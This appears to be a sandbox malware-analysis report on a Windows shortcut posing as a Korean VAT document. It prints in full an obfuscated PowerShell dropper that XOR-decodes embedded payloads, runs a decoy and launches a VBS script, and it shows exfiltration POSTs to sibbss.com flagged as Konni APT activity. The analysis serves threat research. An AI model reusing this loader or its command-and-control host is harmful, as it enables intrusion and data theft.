Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 12, 2024, 10:19 a.m.	June 12, 2024, 10:22 a.m.

Size	52.6MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`0777cbcc96dd9a2d4319a4bf9404bba7`
SHA256	`6d901221cb5162c190cce720726889ccb1f8435f5d71fb05614672497425e931`
CRC32	`C58E76E9`
ssdeep	`3072:bnazb1lV/rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr5rrXPGtQ7BAlWcP:WvVwG760f/92GXwnPTJV`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vvPxIdcySsbVooj" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk"
3044
- cmd.exe "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) ^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm;
  1784
  - powershell.exe powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>*.lnk <#pomster hitlerism#>| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha -kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F:* <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm;
    156
    - Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp"
      284
      - HimTrayIcon.exe "C:\Program Files (x86)\Hnc\Common80\HimTrayIcon.exe"
        2584
    - expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\Byimtb.cab -F:* C:\Users\Public\documents
      1624
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
      236
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
sibbss.com	A 176.97.64.174	176.97.64.174

IP Address	Status	Action
164.124.101.2	Active	Moloch
176.97.64.174	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49176 -> 176.97.64.174:80	2046820	ET MALWARE [ANY.RUN] Konni.APT Exfiltration	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 12, 2024, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 12, 2024, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2024, 10:20 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (14 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0
IsDebuggerPresent June 12, 2024, 10:19 a.m.			0	0

Command line console output was observed (50 out of 563 events)

Time & API	Arguments	Status	Return
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: M console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: R console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: F console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: E console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: x console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: V console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: C console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: g console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: h console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: M console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA June 12, 2024, 10:19 a.m.	buffer: c console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (45 events)

Time & API	Arguments	Status	Return
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002810a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002810a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002810a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002810a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002810a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002810a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002816a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 12, 2024, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280ce8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 12, 2024, 10:19 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header

suspicious_request

POST http://sibbss.com/upload.php

Performs some HTTP requests (1 event)

request

POST http://sibbss.com/upload.php

Sends data using the HTTP POST Method (1 event)

request

POST http://sibbss.com/upload.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 150 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2024, 10:19 a.m.	process_identifier: 156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
